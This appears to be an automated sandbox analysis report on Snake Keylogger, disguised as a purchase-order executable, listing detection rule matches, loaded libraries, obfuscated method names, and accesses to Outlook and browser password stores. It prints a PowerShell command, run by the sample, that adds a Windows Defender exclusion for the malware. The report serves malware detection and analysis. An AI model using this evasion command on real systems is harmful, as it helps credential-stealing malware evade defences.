Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Purchase Order 007823-PO# 005307.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, --m.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, uuVRExIJeZcn6YBP0r.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, uuVRExIJeZcn6YBP0r.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, uuVRExIJeZcn6YBP0r.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/6@4/4

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order 007823-PO# 005307.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drgocfdm.ome.ps1

Jump to behavior

Source: Purchase Order 007823-PO# 005307.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Purchase Order 007823-PO# 005307.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Purchase Order 007823-PO# 005307.exe	ReversingLabs: Detection: 36%
Source: Purchase Order 007823-PO# 005307.exe	Virustotal: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Purchase Order 007823-PO# 005307.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Purchase Order 007823-PO# 005307.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Purchase Order 007823-PO# 005307.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: XpkT.pdb source: Purchase Order 007823-PO# 005307.exe
Source:	Binary string: XpkT.pdbSHA256h! source: Purchase Order 007823-PO# 005307.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: Purchase Order 007823-PO# 005307.exe, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase Order 007823-PO# 005307.exe.3631ea0.0.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	.Net Code: Khx74Nwcom System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase Order 007823-PO# 005307.exe.7320000.6.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase Order 007823-PO# 005307.exe.3619c80.3.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	.Net Code: Khx74Nwcom System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	.Net Code: Khx74Nwcom System.Reflection.Assembly.Load(byte[])

Source: Purchase Order 007823-PO# 005307.exe

Static PE information: 0xBFC6CF92 [Wed Dec 16 07:45:22 2071 UTC]

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 0_2_066D965D push FFFFFF8Bh; iretd	0_2_066D965F
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 0_2_066D0EC8 pushad ; iretd	0_2_066D0EC9
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 0_2_066D7C60 push 84066ECBh; retf	0_2_066D7C69
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 0_2_066D1972 push es; retf	0_2_066D1988
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_0296891E pushad ; iretd	6_2_0296891F
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_02968C2F pushfd ; iretd	6_2_02968C30
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_02968DDF push esp; iretd	6_2_02968DE0

Source: Purchase Order 007823-PO# 005307.exe

Static PE information: section name: .text entropy: 7.742206818544972

Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, RuBRpjsmQGSktTD3uU.cs	High entropy of concatenated method names: 'rrY4OMbRg', 'Sd9lqJEJo', 'TINNCtZNA', 'zhhmsHyuy', 'BYfVosS5t', 'aFanYW5e7', 'NInBKgpagerVWx7bjo', 'YZjN8IMuIAAicIAFb2', 'vKb6CCeVA', 'sbHaHqY7R'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, KlDYvuPcJ4ZXDLlD2t.cs	High entropy of concatenated method names: 'WfHTHwXPJM', 'AQMTDYuWhh', 'pFuTBNg3gb', 'o9uBjuTvo7', 'C6qBznSAKw', 'FvPTetAWCM', 'LLUTha42vF', 'TQgTsCgY1W', 'xLcTZ86bK8', 'RLxT70nYoV'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, H48JFYq2tdnsnGG75c.cs	High entropy of concatenated method names: 'uKt1IfjhdZ', 'tfJ1V8Md6R', 'cL21SbNCKe', 'VU91Oj37QJ', 'a1x12b1eOE', 'Wa01MJYIFE', 'Ipc1PkXPU0', 'NQu1vRfDwA', 'zoR15u42Pb', 'kUH1KdmSFq'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, uuVRExIJeZcn6YBP0r.cs	High entropy of concatenated method names: 'eE8gXOKDwQ', 'durg8mRLfi', 'oo3gYX5Gge', 'nLOgpSsvnZ', 'JFpgcA61di', 'fapgWvqgFW', 'vc8gyvMEse', 'GCmgRpqJdd', 'yATgiZo7rb', 'UFegjU9PUH'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, b2nk8xnoNtknNlXL4j.cs	High entropy of concatenated method names: 'Bx2oA5oKce', 'GZ3omGlXvj', 'CDoD0JH2HA', 'WNcD2uYIK6', 'VWWDMG2FIL', 'oZ8DLplkNk', 'smeDP7t9c6', 'LyXDvhow1w', 'zW8Du0EWTV', 'v8nD5GveZD'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, EAITTaDa7fhQTL9u84.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w6JsiXCudU', 'vkhsjoVuck', 'LxlszaoAO8', 'FSgZeTEMCG', 'XDBZhZH1y4', 'kHBZsa0Dij', 'YXVZZri3tV', 'vpDdN9cVVk9tnC40KGt'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, p3ZODThZKAsx5ayVEbv.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h0SaXnvvWG', 'croa85yXTw', 'bYXaYNTPhb', 'T2iapYFRZk', 'xE2acOqXFb', 'm42aWXxSTv', 'CfRayeS1VR'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, hSbyLT792GkOJwvO67.cs	High entropy of concatenated method names: 'RYJhTuVREx', 'ueZhfcn6YB', 'i3ZhdrJYns', 'es8hxxs2nk', 'AXLhU4jGKQ', 'q3ghGnW8KS', 'ztBRY0dMOukhSVWrXZ', 'uZgXQgrRryfEWfnOYJ', 'Br0hhFHKR7', 'YI1hZFynme'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, aDNJxoV3ZrJYnsCs8x.cs	High entropy of concatenated method names: 'HNPDllJ11J', 's40DNnrMLa', 'YAwDIjGW6l', 'dgSDVDacoO', 'vwXDUYxxka', 'ksnDGwInxi', 'Qd5DttQtEr', 'N7qD6AhmOd', 'NbODFpfpGt', 'v4oDaCZfUh'
